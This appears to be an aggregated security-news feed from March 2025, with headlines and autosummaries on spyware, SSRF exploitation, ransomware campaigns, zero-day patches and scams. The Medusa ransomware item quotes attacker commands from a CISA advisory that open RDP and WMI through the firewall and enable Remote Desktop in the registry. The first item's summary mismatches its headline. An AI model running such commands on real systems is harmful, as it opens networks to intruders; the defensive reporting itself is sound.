    The North Korea-linked threat actor known as ScarCruft is said to have been behind a never-before-seen Android surveillance tool named KoSpy targeting Korean and English-speaking users. Lookout, which shared details of the malware campaign, said the earliest versions date back to March 2022. The most recent samples were flagged in March 2024. It's not clear how successful these efforts were. "

    Autosummary: The list of now-removed packages is below: is-buffer-validator, yoojae-validator, event-handle-package, array-empty-validator, react-event-dependency, auth-validator. The packages are designed to collect system environment details, as well as credentials stored in web browsers such as Google Chrome, Brave, and Mozilla Firefox. The malware is designed to collect a wide range of data from the compromised device, including SMS messages, call logs, device location, files in local storage, screenshots, keystrokes, Wi-Fi network information, and the list of installed applications. "


    Experts warn of a coordinated surge in the exploitation attempts of SSRF vulnerabilities

    exploits
    2025-03-13 https://securityaffairs.com/175344/hacking/coordinated-surge-exploitation-attempts-ssrf-vulnerabilities.html
    Researchers warn of a “coordinated surge” in the exploitation attempts of SSRF vulnerabilities in multiple platforms. Threat intelligence firm GreyNoise observed Grafana path traversal exploitation attempts before the Server-Side Request Forgery (SSRF) surge on March 9, suggesting the attackers may be leveraging Grafana as an initial entry point for deeper exploitation. The experts believe the […] "

    Autosummary: "


    New SuperBlack ransomware exploits Fortinet auth bypass flaws

    exploits ransomware
    2025-03-13 https://www.bleepingcomputer.com/news/security/new-superblack-ransomware-exploits-fortinet-auth-bypass-flaws/
    A new ransomware operator named "Mora_001" is exploiting two Fortinet vulnerabilities to gain unauthorized access to firewall appliances and deploy a custom ransomware strain dubbed SuperBlack. [...] "

    Autosummary: Mora_001's attack chain overview (Source: Forescout). After this, the attacker maps the network and attempts lateral movement using stolen VPN credentials and newly added VPN accounts, Windows Management Instrumentation (WMIC) & SSH, and TACACS+/RADIUS authentication. "


    Burnout in cybersecurity: How CISOs can protect their teams (and themselves)

    ciber
    2025-03-12 https://www.helpnetsecurity.com/2025/03/12/cybersecurity-burnout-ciso/

    Cybersecurity is a high-stakes, high-pressure field in which CISOs and their teams constantly battle threats, compliance requirements, and business expectations. The demand for 24/7 vigilance, sophisticated attacks, and a shortage of skilled professionals have led to a burnout epidemic in the industry. For CISOs, this isn’t just a personal issue; it’s a business risk. A burned-out team is less effective, more prone to errors, and more likely to leave, creating knowledge gaps that further strain … More

    The post Burnout in cybersecurity: How CISOs can protect their teams (and themselves) appeared first on Help Net Security.

    "

    Autosummary: “These challenges are placing immense pressure on CISOs, resulting in heightening stress and the risk of burnout on them and their teams,” Brian Honan, CEO at BH Consulting, told Help Net Security. Cybersecurity is a high-stakes, high-pressure field in which CISOs and their teams constantly battle threats, compliance requirements, and business expectations. Managing the workload: Prioritization and automation. Security teams are overwhelmed by a never-ending stream of alerts, incidents, and compliance requirements. “In addition to managing cyber threats and changing business challenges, today’s CISO must also deal with the increasing burden to deal with regulations such as the EU GDPR, NIS2, and DORA. "


    Apple Releases Patch for WebKit Zero-Day Vulnerability Exploited in Targeted Attacks

    exploits
    2025-03-12 https://thehackernews.com/2025/03/apple-releases-patch-for-webkit-zero.html
    Apple on Tuesday released a security update to address a zero-day flaw that it said has been exploited in "extremely sophisticated" attacks. The vulnerability has been assigned the CVE identifier CVE-2025-24201 and is rooted in the WebKit web browser engine component. It has been described as an out-of-bounds write issue that could allow an attacker to craft malicious web content such that it "

    Autosummary: "


    Over 400 IPs Exploiting Multiple SSRF Vulnerabilities in Coordinated Cyber Attack

    exploits
    2025-03-12 https://thehackernews.com/2025/03/over-400-ips-exploiting-multiple-ssrf.html
    Threat intelligence firm GreyNoise is warning of a "coordinated surge" in the exploitation of Server-Side Request Forgery (SSRF) vulnerabilities spanning multiple platforms. "At least 400 IPs have been seen actively exploiting multiple SSRF CVEs simultaneously, with notable overlap between attack attempts," the company said, adding it observed the activity on March 9, 2025. The countries which "

    Autosummary: "


    URGENT: Microsoft Patches 57 Security Flaws, Including 6 Actively Exploited Zero-Days

    exploits
    2025-03-12 https://thehackernews.com/2025/03/urgent-microsoft-patches-57-security.html
    Microsoft on Tuesday released security updates to address 57 security vulnerabilities in its software, including a whopping six zero-days that it said have been actively exploited in the wild. Of the 56 flaws, six are rated Critical, 50 are rated Important, and one is rated Low in severity. Twenty-three of the addressed vulnerabilities are remote code execution bugs and 22 relate to privilege "

    Autosummary: An out-of-bounds read vulnerability in Windows NTFS that allows an authorized attacker to disclose information locally; CVE-2025-24993 (CVSS score: 7.8) - A heap-based buffer overflow vulnerability in Windows NTFS that allows an unauthorized attacker to execute code locally; CVE-2025-26633 (CVSS score: 7.0) - An improper neutralization vulnerability in Microsoft Management Console that allows an unauthorized attacker to bypass a security feature locally. ESET, which is credited with discovering and reporting CVE-2025-24983, said it first discovered the zero-day exploit in the wild in March 2023, delivered via a backdoor named PipeMagic on compromised hosts. A Windows Win32 Kernel Subsystem use-after-free (UAF) vulnerability that allows an authorized attacker to elevate privileges locally (CVSS score: 7.0); CVE-2025-24984 (CVSS score: 4.6) - A Windows NTFS information disclosure vulnerability that allows an attacker with physical access to a target device and the ability to plug in a malicious USB drive to potentially read portions of heap memory; CVE-2025-24985 (CVSS score: 7.8) - "


    Microsoft patches Windows Kernel zero-day exploited since 2023

    exploits Linux
    2025-03-12 https://www.bleepingcomputer.com/news/microsoft/microsoft-patches-windows-kernel-zero-day-exploited-since-2023/
    Slovak cybersecurity company ESET says a newly patched zero-day vulnerability in the Windows Win32 Kernel Subsystem has been exploited in attacks since March 2023. [...] "

    Autosummary: During the March 2025 Patch Tuesday, Microsoft also patched the following five zero-day vulnerabilities tagged as actively exploited: CVE-2025-24984 - Windows NTFS Information Disclosure Vulnerability; CVE-2025-24985 - Windows Fast FAT File System Driver Remote Code Execution Vulnerability; CVE-2025-24991 - Windows NTFS Information Disclosure Vulnerability; CVE-2025-24993 - Windows NTFS Remote Code Execution Vulnerability; CVE-2025-26633 - Microsoft Management Console Security Feature Bypass Vulnerability. Yesterday, CISA added all six zero-days to its Known Exploited Vulnerabilities Catalog, ordering Federal Civilian Executive Branch (FCEB) agencies to secure their systems by April 1st, as required by the Binding Operational Directive (BOD) 22-01. "


    Update your iPhone now: Apple patches vulnerability used in “extremely sophisticated attacks”

    exploits
    2025-03-12 https://www.malwarebytes.com/blog/news/2025/03/update-your-iphone-now-apple-patches-vulnerability-used-in-extremely-sophisticated-attacks
    Apple has patched a vulnerability in iOS and iPadOS that was under active exploitation in extremely sophisticated attacks. "

    Autosummary: The update is available for: iPhone XS and later, iPad Pro 13-inch, iPad Pro 12.9-inch 3rd generation and later, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 7th generation and later, and iPad mini 5th generation and later. "


    The dark side of sports betting: How mirror sites help gambling scams thrive

    financial
    2025-03-12 https://www.malwarebytes.com/blog/personal/2025/03/the-dark-side-of-sports-betting-how-mirror-sites-help-gambling-scams-thrive
    Sports betting is a multi-billion-dollar industry, but behind the flashing lights and promises of easy money lies a hidden underworld of deception. "

    Autosummary: How gambling companies exploit mirror domains: A mirror site is essentially a clone of an existing betting website, hosted on a different domain. How to protect yourself from betting scams: With the rise of mirror sites, it’s more important than ever to be cautious when engaging in online sports betting. "


    From Mexico cartel safe house to US streets: BBC tracks deadly fentanyl targeted by Trump tariffs

    latam
    2025-03-12 https://www.bbc.com/news/articles/cy5ng663d1wo
    One cartel member tells the BBC's Quentin Sommerville the impact of the illegal drug is "not my problem". "

    Autosummary: As she walks the neighbourhood, Ms Pichardo finds people passed out on the pavement, a woman in a stupor with her trousers down, a man lying prone next to a metro turnstile, another man in a wheelchair, his eyes closed and money in his hands. She bristles at terms like "addict", "junkie" or "zombie", which have been used to describe the people of her neighbourhood. A memorial to thousands of fentanyl overdose victims is displayed at the Drug Enforcement Administration's headquarters. President Sheinbaum has also recently emphasised the demand side of the crisis, saying the US fentanyl crisis began with the legal but "irresponsible approval" of painkillers, such as OxyContin, starting in the late 1990s. Rosalind Pichardo has reversed thousands of opioid overdoses with the drug Naloxone (photo: Darren Conway/BBC). Ms Pichardo, who runs a drop-in centre called Sunshine House, operates what she calls a "no-judgement zone". "Look at this one, seven years old, two Narcans," she points out. Mexico has also made it harder to import a key ingredient of fentanyl from China, prompting cartels to reduce the strength of each pill - and, in the process, making them less deadly. "


    Secret hearing on Friday in Apple and UK government data row

    government
    2025-03-12 https://www.bbc.com/news/articles/c798xv5qwylo
    The BBC understands the dispute over accessing encrypted data is set to be heard at the High Court.


    Facebook discloses FreeType 2 flaw exploited in attacks

    exploits
    2025-03-12 https://www.bleepingcomputer.com/news/security/facebook-discloses-freetype-2-flaw-exploited-in-attacks/
    Facebook is warning that a FreeType vulnerability in all versions up to 2.13 can lead to arbitrary code execution, with reports that the flaw has been exploited in attacks. [...]

    Autosummary: The library is installed in millions of systems and services, including Linux, Android, game engines, GUI frameworks, and online platforms.


    CISA: Medusa ransomware hit over 300 critical infrastructure orgs

    exploits ransomware
    2025-03-12 https://www.bleepingcomputer.com/news/security/cisa-medusa-ransomware-hit-over-300-critical-infrastructure-orgs/
    CISA says the Medusa ransomware operation had impacted over 300 organizations in critical infrastructure sectors in the United States as of last month. [...]

    Autosummary: "As of February 2025, Medusa developers and affiliates have impacted over 300 victims from a variety of critical infrastructure sectors with affected industries including medical, education, legal, insurance, technology, and manufacturing," CISA, the FBI, and MS-ISAC warned on Wednesday.


    U.S. CISA adds six Microsoft Windows flaws to its Known Exploited Vulnerabilities catalog

    exploits
    2025-03-12 https://securityaffairs.com/175298/hacking/u-s-cisa-adds-six-microsoft-windows-flaws-to-its-known-exploited-vulnerabilities-catalog.html
    U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds six Microsoft Windows flaws to its Known Exploited Vulnerabilities catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added the following vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog: Below are the descriptions of these flaws that Microsoft addressed with the release of Microsoft Patch Tuesday security updates for […]

    Autosummary: The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added the following vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog: CVE-2025-24983, Microsoft Windows Win32k Use-After-Free Vulnerability; CVE-2025-24984, Microsoft Windows NTFS Information Disclosure Vulnerability; CVE-2025-24985, Microsoft Windows


    Microsoft Patch Tuesday security updates for March 2025 fix six actively exploited zero-days

    exploits
    2025-03-12 https://securityaffairs.com/175289/hacking/microsoft-patch-tuesday-security-updates-for-march-2025.html
    Microsoft Patch Tuesday security updates for March 2025 address 56 security vulnerabilities in its products, including six actively exploited zero-days. Microsoft Patch Tuesday security updates for March 2025 addressed 56 vulnerabilities in Windows and Windows Components, Office and Office Components, Azure, .NET and Visual Studio, Remote Desktop Services, DNS Server, and Hyper-V Server. This Patch […]

    Autosummary: Microsoft Patch Tuesday security updates for March 2025 fix six actively exploited zero-days. Pierluigi Paganini, March 12, 2025. Microsoft Patch Tuesday security updates for March 2025 address 56 security vulnerabilities in its products, including six actively exploited zero-days.


    Cybersecurity jobs available right now: March 11, 2025

    ciber
    2025-03-11 https://www.helpnetsecurity.com/2025/03/11/cybersecurity-jobs-available-right-now-march-112025/

    The post Cybersecurity jobs available right now: March 11, 2025 appeared first on Help Net Security.

    Autosummary: Senior Penetration Tester, Ekco | Ireland | On-site: As a Senior Penetration Tester, you will conduct comprehensive penetration tests on clients’ systems across various platforms (including web applications, mobile applications, thick client applications, infrastructure, APIs, cloud platforms) to identify security vulnerabilities, weaknesses, and potential risks. Digital Security – Principal Specialist, Security Risk & Assurance, AVEVA | United Kingdom | Hybrid: As a Digital Security – Principal Specialist, Security Risk & Assurance, you will build, operate, and optimise security risk management and risk assurance services that enable effective, data-driven risk management and reporting across operations. Open-Source Intelligence Analyst/Senior Associate, Forensic, Deloitte | Canada | Hybrid: As an Open-Source Intelligence Analyst/Senior Associate, Forensic, you collect, assess and disseminate publicly available data and information from social media, deep, and dark web sources in response to priority intelligence requirements on matters relating to financial crime, integrity and reputation concerns, strategy and a variety of risk issues. Endpoint Security Engineer, HCLTech | UAE | On-site: As an Endpoint Security Engineer, you will design, deploy, and manage endpoint security solutions such as antivirus, EDR, DLP, and device control systems.


    CISA Adds Five Actively Exploited Vulnerabilities in Advantive VeraCore and Ivanti EPM to KEV List

    exploits
    2025-03-11 https://thehackernews.com/2025/03/cisa-adds-five-actively-exploited.html
    The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Monday added five security flaws impacting Advantive VeraCore and Ivanti Endpoint Manager (EPM) to its Known Exploited Vulnerabilities (KEV) catalog, based on evidence of active exploitation in the wild. The list of vulnerabilities is as follows - CVE-2024-57968 - An unrestricted file upload vulnerability in Advantive VeraCore


    Smart cybersecurity spending and how CISOs can invest where it matters

    ciber
    2025-03-11 https://www.helpnetsecurity.com/2025/03/11/ciso-smart-cybersecurity-spending/

    CISOs face mounting pressure to spend wisely on security. Yet, many organizations remain vulnerable due to misplaced priorities and inefficient budgeting. This article explores common pitfalls and offers strategies to strengthen cybersecurity. Recent data highlights a paradox: while cybersecurity budgets rise, security incidents continue unabated. A survey by the Ponemon Institute revealed a 59% increase in cyber budgets year-over-year, yet 61% of organizations experienced a data breach or cybersecurity incident in the past two years. … More

    The post Smart cybersecurity spending and how CISOs can invest where it matters appeared first on Help Net Security.

    Autosummary: “When security spending isn’t part of a closed-loop system that connects real-world threats to measurable outcomes, you’re essentially paying for digital theater rather than actual protection,” Alex Rice, CTO at HackerOne, told Help Net Security. Areas that need more investment: incident response planning. Many organizations lack an incident response plan, leading to prolonged recovery times and increased breach costs. Recommendation: Allocate funds for ongoing, role-specific cybersecurity training to foster a security-aware culture.


    How remote work strengthens cybersecurity teams

    ciber
    2025-03-11 https://www.helpnetsecurity.com/2025/03/11/remote-work-cybersecurity-teams/

    The global transition to remote work has reshaped traditional workplace dynamics, introducing challenges and opportunities for cybersecurity teams. For CISOs and security professionals, embracing a remote workforce can be a strategic advantage, enhancing team capabilities and driving the modernization of security practices. Specialized security positions For CISOs struggling to fill highly specialized cybersecurity roles, remote work provides a critical advantage: access to a global talent marketplace where niche expertise is more readily available. Instead of … More

    The post How remote work strengthens cybersecurity teams appeared first on Help Net Security.

    Autosummary: For example, having deep-knowledge specialists distributed around the world, working flexible hours, allows an organization to pull them in during an incident response, whatever the time of day, or day of the week.


    Moxa Issues Fix for Critical Authentication Bypass Vulnerability in PT Switches

    exploits
    2025-03-11 https://thehackernews.com/2025/03/moxa-issues-fix-for-critical.html
    Taiwanese company Moxa has released a security update to address a critical security flaw impacting its PT switches that could permit an attacker to bypass authentication guarantees. The vulnerability, tracked as CVE-2024-12297, has been assigned a CVSS v4 score of 9.2 out of a maximum of 10.0. "Multiple Moxa PT switches are vulnerable to an authentication bypass because of flaws in their


    U.S. CISA adds Advantive VeraCore and Ivanti EPM flaws to its Known Exploited Vulnerabilities catalog

    exploits
    2025-03-11 https://securityaffairs.com/175232/breaking-news/u-s-cisa-adds-advantive-veracore-and-ivanti-epm-flaws-to-its-known-exploited-vulnerabilities-catalog.html
    U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds Advantive VeraCore and Ivanti EPM flaws to its Known Exploited Vulnerabilities catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added the following vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog: A Vietnamese cybercrime group, tracked as XE Group, is exploiting the above VeraCore vulnerabilities, deploying reverse shells and web shells […]


    Cybersecurity Challenges in Cross-Border Data Transfers and Regulatory Compliance Strategies

    ciber
    2025-03-11 https://securityaffairs.com/175223/security/cybersecurity-challenges-in-cross-border-data-transfers-and-regulatory-compliance-strategies.html
    Cross-border data transfers enable global business but face challenges from varying cybersecurity laws, increasing risks of cyberattacks and data breaches. The digital revolution has enabled organizations to operate seamlessly across national boundaries, relying on cross-border data transfers to support e-commerce, cloud computing, artificial intelligence, and financial transactions. However, as data moves across multiple jurisdictions, it […]

    Autosummary: Table 2: Geopolitical Factors Affecting Cross-Border Data Transfers (Factor / Impact on Data Transfers): Trade Restrictions / Limits data exchange between certain countries; Data Localization Laws / Requires in-country storage, increasing compliance costs; Government Surveillance Laws / Allows state access to private sector data; Cybersecurity Diplomacy Conflicts / Disrupts international cooperation on cybersecurity standards. As geopolitical tensions continue to rise, businesses must remain vigilant in monitoring changes in regulatory policies that could impact their ability to transfer data securely. At the same time, the growing threats of cyberattacks, including ransomware, phishing, and insider threats, highlight the need for continuous monitoring, automated compliance solutions, and robust security architectures to safeguard sensitive data during cross-border transactions. Hackers deploy various techniques, such as man-in-the-middle attacks, ransomware, phishing schemes, and supply chain compromises, to intercept, manipulate, or steal sensitive data. Cybersecurity Challenges in Cross-Border Data Transfers and Regulatory Compliance Strategies. Pierluigi Paganini, March 11, 2025. Cross-border data transfers enable global business but face challenges from varying cybersecurity laws, increasing risks of cyberattacks and data breaches.


    CISA tags critical Ivanti EPM flaws as actively exploited in attacks

    exploits
    2025-03-11 https://www.bleepingcomputer.com/news/security/cisa-tags-critical-ivanti-epm-flaws-as-actively-exploited-in-attacks/
    CISA warned U.S. federal agencies to secure their networks against attacks exploiting three critical vulnerabilities affecting Ivanti Endpoint Manager (EPM) appliances. [...]


    Ballista Botnet Exploits Unpatched TP-Link Vulnerability, Infects Over 6,000 Devices

    exploits
    2025-03-11 https://thehackernews.com/2025/03/ballista-botnet-exploits-unpatched-tp.html
    Unpatched TP-Link Archer routers have become the target of a new botnet campaign dubbed Ballista, according to new findings from the Cato CTRL team. "The botnet exploits a remote code execution (RCE) vulnerability in TP-Link Archer routers (CVE-2023-1389) to spread itself automatically over the Internet," security researchers Ofek Vardi and Matan Mittelman said in a technical report shared with

    Autosummary: Some of the supported commands are listed below: flooder, which triggers a flood attack; exploiter, which exploits CVE-2023-1389; start, an optional parameter that is used with the exploiter to start the module; close, which stops the module triggering function; shell, which runs a Linux shell command on the local system.


    A dating app for video games tackles one of the industry's big issues

    industry
    2025-03-11 https://www.bbc.com/news/articles/cr52rey0ng8o
    Ludocene is taking a cue from Tinder in an attempt to address a big problem for smaller developers.

    Autosummary: "Having an approach that helps you discover things that give you a better sense of whether you're going to like it allows you to invest your money, and for me, more importantly, your time in the things that you really enjoy," he says. "And so what we're hoping is not just to get the popular games everybody's playing, but those kind of odd little games that would be a perfect match just for you," says Andy. "Hopefully, they're finding the things that existing algorithms are missing - really high quality games that didn't quite get the marketing at launch or the media coverage," she says.


    MassJacker malware uses 778,000 wallets to steal cryptocurrency

    exploits
    2025-03-11 https://www.bleepingcomputer.com/news/security/massjacker-malware-uses-778-000-wallets-to-steal-cryptocurrency/
    A newly discovered clipboard hijacking operation dubbed "MassJacker" uses at least 778,531 cryptocurrency wallet addresses to steal digital assets from compromised computers. [...]

    Autosummary: PackerD1 decrypts and injects PackerD2, which eventually decompresses and extracts the final payload, MassJacker, and injects it into the legitimate Windows process "InstallUtil.exe." (Figure: MassJacker infection chain. Source: CyberArk.) MassJacker monitors the clipboard for cryptocurrency wallet addresses using regex patterns, and if a match is found, it replaces it with an attacker-controlled wallet address from an encrypted list.


    Critical PHP RCE vulnerability mass exploited in new attacks

    exploits
    2025-03-11 https://www.bleepingcomputer.com/news/security/critical-php-rce-vulnerability-mass-exploited-in-new-attacks/
    Threat intelligence company GreyNoise warns that a critical PHP remote code execution vulnerability that impacts Windows systems is now under mass exploitation. [...]


    PowerSchool previously hacked in August, months before data breach

    financial
    2025-03-11 https://www.bleepingcomputer.com/news/security/powerschool-previously-hacked-in-august-months-before-data-breach/
    PowerSchool has published a long-awaited CrowdStrike investigation into its massive December 2024 data breach, which determined that the company was previously hacked over 4 months earlier, in August, and then again in September. [...]

    Autosummary: PowerSchool is a cloud-based K-12 software provider serving over 60 million students and 18,000 customers worldwide, offering enrollment, communication, attendance, staff management, learning, analytics, and finance solutions.


    How to spot and avoid AI-generated scams

    financial
    2025-03-11 https://www.helpnetsecurity.com/2025/03/11/how-to-spot-ai-generated-scams/

    As AI technology advances, cybercriminals create more personalized and convincing scams. This includes mimicking voices, deepfake videos, and highly convincing phishing emails that are difficult to spot. Phishing, deepfakes, and voice cloning are among the most common AI-driven techniques used by cybercriminals. Phishing: Ivanti’s research shows that attackers use GenAI to craft believable content at scale and low cost, making phishing attacks more effective. They believe that this threat vector will become even more powerful … More

    The post How to spot and avoid AI-generated scams appeared first on Help Net Security.

    Autosummary: GenAI has made it easier for cybercriminals to create convincing deepfakes, phishing campaigns, and investment scams, enhancing their efficiency, but the good news is that adversaries’ use of GenAI has not yet matched the hype. Tips to protect against AI-generated scams: Whether it’s an email, phone call, or message on social media, always approach unsolicited contact with caution.


    Apple fixes WebKit zero-day exploited in ‘extremely sophisticated’ attacks

    exploits
    2025-03-11 https://www.bleepingcomputer.com/news/apple/apple-fixes-webkit-zero-day-exploited-in-extremely-sophisticated-attacks/
    Apple has released emergency security updates to patch a zero-day bug the company describes as exploited in "extremely sophisticated" attacks. [...]


    Microsoft March 2025 Patch Tuesday fixes 7 zero-days, 57 flaws

    exploits
    2025-03-11 https://www.bleepingcomputer.com/news/microsoft/microsoft-march-2025-patch-tuesday-fixes-7-zero-days-57-flaws/
    Today is Microsoft's March 2025 Patch Tuesday, which includes security updates for 57 flaws, including six actively exploited zero-day vulnerabilities. [...]

    Autosummary: The number of bugs in each vulnerability category is listed below: 23 Elevation of Privilege Vulnerabilities, 3 Security Feature Bypass Vulnerabilities, 23 Remote Code Execution Vulnerabilities, 4 Information Disclosure Vulnerabilities, 1 Denial of Service Vulnerability, 3. The actively exploited zero-day vulnerabilities in today's updates are: CVE-2025-24983 - Windows Win32 Kernel Subsystem Elevation of Privilege Vulnerability. Microsoft says this vulnerability will allow local attackers to gain SYSTEM privileges on the device after winning a race condition.


    Blind Eagle Hacks Colombian Institutions Using NTLM Flaw, RATs and GitHub-Based Attacks

    latam
    2025-03-11 https://thehackernews.com/2025/03/blind-eagle-hacks-colombian.html
    The threat actor known as Blind Eagle has been linked to a series of ongoing campaigns targeting Colombian institutions and government entities since November 2024. "The monitored campaigns targeted Colombian judicial institutions and other government or private organizations, with high infection rates," Check Point said in a new analysis. "More than 1,600 victims were affected during one of

    Autosummary: While the HTML file, named "Ver Datos del Formulario.html," was deleted from the repository on February 25, 2025, it has been found to contain details such as usernames, passwords, email, email passwords, and ATM PINs associated with individuals, government agencies, educational institutions, and businesses operating in Colombia.


    Switzerland’s NCSC requires cyberattack reporting for critical infrastructure within 24 hours

    ciber
    2025-03-11 https://securityaffairs.com/175260/laws-and-regulations/switzerlands-ncsc-requires-cyberattack-reporting-for-critical-infrastructure-within-24-hours.html
    Switzerland’s NCSC mandates critical infrastructure organizations to report cyberattacks within 24 hours of discovery. Switzerland’s National Cybersecurity Centre (NCSC) now requires critical infrastructure organizations to report cyberattacks within 24 hours due to rising cybersecurity threats. The new policy on security breach notification is introduced in response to the increasing number of cyber incidents. […]

    Autosummary: Switzerland’s NCSC requires cyberattack reporting for critical infrastructure within 24 hours. Pierluigi Paganini, March 11, 2025. Switzerland’s NCSC mandates critical infrastructure organizations to report cyberattacks within 24 hours of discovery.


    Apple fixed the third actively exploited zero-day of 2025

    exploits
    2025-03-11 https://securityaffairs.com/175269/hacking/apple-third-zero-day-2025.html
    Apple addressed a zero-day vulnerability, tracked as CVE-2025-24201, that has been exploited in “extremely sophisticated” cyber attacks. Apple has released emergency security updates to address a zero-day vulnerability, tracked as CVE-2025-24201, in the WebKit cross-platform web browser engine. The vulnerability is an out-of-bounds write issue that was exploited in “extremely sophisticated” attacks. An attacker can […]

    Autosummary: The flaw impacts iPhone XS and later, iPad Pro 13-inch, iPad Pro 12.9-inch 3rd generation and later, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 7th generation and later, and iPad mini 5th generation and later, Macs running macOS Sequoia, and Apple Vision Pro. Apple did not disclose details about the attacks or attribute them to any threat actor.


    #StopRansomware: Medusa Ransomware

    exploits ransomware
    2025-03-11 https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-071a

    Summary

    Note: This joint Cybersecurity Advisory is part of an ongoing #StopRansomware effort to publish advisories for network defenders detailing various ransomware variants and ransomware threat actors. These #StopRansomware advisories include recently and historically observed tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) to help organizations protect against ransomware. Visit stopransomware.gov to see all #StopRansomware advisories and to learn more about other ransomware threats and no-cost resources.

    The Federal Bureau of Investigation (FBI), Cybersecurity and Infrastructure Security Agency (CISA), and the Multi-State Information Sharing and Analysis Center (MS-ISAC) are releasing this joint advisory to disseminate known Medusa ransomware TTPs and IOCs, identified through FBI investigations as recently as February 2025. 

    Medusa is a ransomware-as-a-service (RaaS) variant first identified in June 2021. As of February 2025, Medusa developers and affiliates have impacted over 300 victims from a variety of critical infrastructure sectors with affected industries including medical, education, legal, insurance, technology, and manufacturing. The Medusa ransomware variant is unrelated to the MedusaLocker variant and the Medusa mobile malware variant per the FBI’s investigation.

    FBI, CISA, and MS-ISAC encourage organizations to implement the recommendations in the Mitigations section of this advisory to reduce the likelihood and impact of Medusa ransomware incidents.


    Autosummary: Once a foothold in a victim network is established, commonly scanned ports include: 21 (FTP), 22 (SSH), 23 (Telnet), 80 (HTTP), 115 (SFTP), 443 (HTTPS), 1433 (SQL database), 3050 (Firebird database), 3128 (HTTP web proxy), 3306 (MySQL database), 3389 (RDP). Medusa actors primarily use PowerShell [T1059.001] and the Windows Command Prompt (cmd.exe) [T1059.003] for network [T1046] and filesystem enumeration [T1083] and to utilize Ingress Tool Transfer capabilities [T1105]. Medusa IABs (affiliates) are known to make use of common techniques, such as: Discovery: Medusa actors use living off the land (LOTL) and legitimate tools Advanced IP Scanner and SoftPerfect Network Scanner for initial user, system, and network enumeration. A firewall rule permitting inbound RDP is added: netsh advfirewall firewall add rule name="rdp" dir=in protocol=tcp localport=3389 action=allow. Then, a rule to allow remote WMI connections is created: netsh advfirewall firewall set rule group="windows management instrumentation (wmi)" new enable=yes. Finally, the registry is modified to allow Remote Desktop connections: reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t. Investigations identified Medusa actors using remote access software AnyDesk, Atera, ConnectWise, eHorus, N-able, PDQ Deploy, PDQ Inventory, SimpleHelp, and Splashtop.


    SilentCryptoMiner Infects 2,000 Russian Users via Fake VPN and DPI Bypass Tools

    rusia-ucrania
    2025-03-10 https://thehackernews.com/2025/03/silentcryptominer-infects-2000-russian.html
    A new mass malware campaign is infecting users with a cryptocurrency miner named SilentCryptoMiner by masquerading it as a tool designed to circumvent internet blocks and restrictions around online services. Russian cybersecurity company Kaspersky said the activity is part of a larger trend where cybercriminals are increasingly leveraging Windows Packet Divert (WPD) tools to distribute malware

    Autosummary: The approach has been used as part of schemes that propagate stealers, remote access tools (RATs), trojans that provide hidden remote access, and cryptocurrency miners like NJRat, XWorm, Phemedrone, and DCRat.


    Software bug at firm left NHS data "vulnerable to hackers"

    exploits
    2025-03-10 https://www.bbc.com/news/articles/c5yxv7wylz7o
    The NHS is looking into claims that a software flaw at Medefer left patient data vulnerable.

    Autosummary: "Even if the company suspected that no data was stolen, when facing an issue that could have resulted in a data breach, especially with data of the nature in question, an investigation and confirmation from a suitably qualified cybersecurity expert would be advisable," says Scott Helme, a security researcher. However, the software bug, discovered in November, made Medefer's internal patient record system vulnerable to hackers, the engineer said.


    Malwarebytes Premium Security awarded “Product of the Year” from AVLab

    exploits
    2025-03-10 https://www.malwarebytes.com/blog/personal/2025/03/malwarebytes-premium-security-awarded-product-of-the-year-from-avlab
    Malwarebytes Premium Security has once again been awarded “Product of the Year” after successfully blocking 100% of “in-the-wild” malware samples.

    Autosummary: To ensure the evaluations reflect current cyberthreats, each round of testing follows three steps: Collecting and verifying in-the-wild malware: AVLab regularly collects malware samples from malicious and active URLs, testing the malware samples to understand their impact to networks and endpoints.


    Desert Dexter Targets 900 Victims Using Facebook Ads and Telegram Malware Links

    exploits
    2025-03-10 https://thehackernews.com/2025/03/desert-dexter-targets-900-victims-using.html
    The Middle East and North Africa have become the target of a new campaign that delivers a modified version of a known malware called AsyncRAT since September 2024. "The campaign, which leverages social media to distribute malware, is tied to the region's current geopolitical climate," Positive Technologies researchers Klimentiy Galkin and Stanislav Pyzhov said in an analysis published last week.

    Autosummary: Specifically, it terminates processes associated with various .NET services that could prevent the malware from starting, deletes files with the extensions BAT, PS1, and VBS from "C:\ProgramData\WindowsHost" and "C:\Users\Public" folders, and creates a new VBS file in C:\ProgramData\WindowsHost, and BAT and PS1 files in C:\Users\Public.


    North Korea-linked APT Moonstone used Qilin ransomware in limited attacks

    exploits ransomware
    2025-03-10 https://securityaffairs.com/175178/apt/north-korea-linked-apt-moonstone-used-qilin-ransomware.html
    Microsoft researchers reported that North Korea-linked APT tracked as Moonstone Sleet has employed the Qilin ransomware in limited attacks. Microsoft observed a North Korea-linked APT group, tracked as Moonstone Sleet, deploying Qilin ransomware in limited attacks since February 2025. The APT group uses Qilin ransomware after previously using custom ransomware. “Moonstone Sleet has previously exclusively […]

    Autosummary: Moonstone Sleet threat actors target financial and cyberespionage victims using trojanized software, custom malware, malicious games, and fake companies like StarGlow Ventures and C.C. Waterfall to engage victims on LinkedIn, freelancing sites, Telegram, and email.


    Large-scale cryptocurrency miner campaign targets Russian users with SilentCryptoMiner

    rusia-ucrania
    2025-03-10 https://securityaffairs.com/175169/breaking-news/miner-campaign-targeting-russian-users-with-silentcryptominer.html
    Experts warn of a large-scale cryptocurrency miner campaign targeting Russian users with SilentCryptoMiner. Kaspersky researchers discovered a mass malware campaign spreading SilentCryptoMiner by disguising it as a tool to bypass internet restrictions. While investigating the increased use of Windows Packet Divert (WPD) tools by crooks to distribute malware under this pretense, the researchers spotted the […]

